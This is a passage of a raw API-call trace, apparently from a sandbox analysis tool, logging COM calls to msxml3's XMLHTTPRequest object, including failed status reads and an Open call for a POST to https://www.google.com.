	[0215.133] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7500, dispIdMember=10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28d9f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a4a0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a4a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8000000a, varVal2=0x0), pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="The data necessary to complete this operation is not yet available.\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x8000000a), puArgErr=0x28da10*=0x0) returned 0x80020009
	[0215.134] longjmp () 
	[0215.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0215.134] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0215.134] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0215.134] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0215.134] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7500, dispIdMember=7, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28d2a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a458, pExcepInfo=0x28d2f0, puArgErr=0x28d2c0 | out: pDispParams=0x28d2a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a458*(varType=0x0, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x80004005, varVal2=0x0), pExcepInfo=0x28d2f0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x28d2c0*=0x0) returned 0x80020009
	[0215.134] longjmp () 
	[0215.135] ??2@YAPEAX_K@Z () returned 0x469a70
	[0215.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0215.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0215.135] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0215.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0215.135] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7500, dispIdMember=7, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28d2a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a458, pExcepInfo=0x28d2f0, puArgErr=0x28d2c0 | out: pDispParams=0x28d2a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x62a458*(varType=0x0, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x80004005, varVal2=0x0), pExcepInfo=0x28d2f0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x28d2c0*=0xffffffff) returned 0x80020009
	[0215.135] longjmp () 
	[0215.138] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.138] SysStringLen (param_1=0x0) returned 0x0
	[0215.138] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.138] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0215.138] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0215.138] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0215.138] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x629bd0) returned 0x0
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0215.138] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x629bd0) returned 0x0
	[0215.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x629bd0) returned 0x0
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x629bd0) returned 0x0
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.139] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x629bd0) returned 0x0
	[0215.139] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0215.139] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.139] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0215.139] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0215.139] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0215.140] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x2
	[0215.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.140] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.142] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x2
	[0215.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.142] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7450, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x28dee0) returned 0x0
	[0215.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0215.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0215.142] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0215.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x629bd0) returned 0x0
	[0215.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x629bd0) returned 0x0
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x629bd0) returned 0x0
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
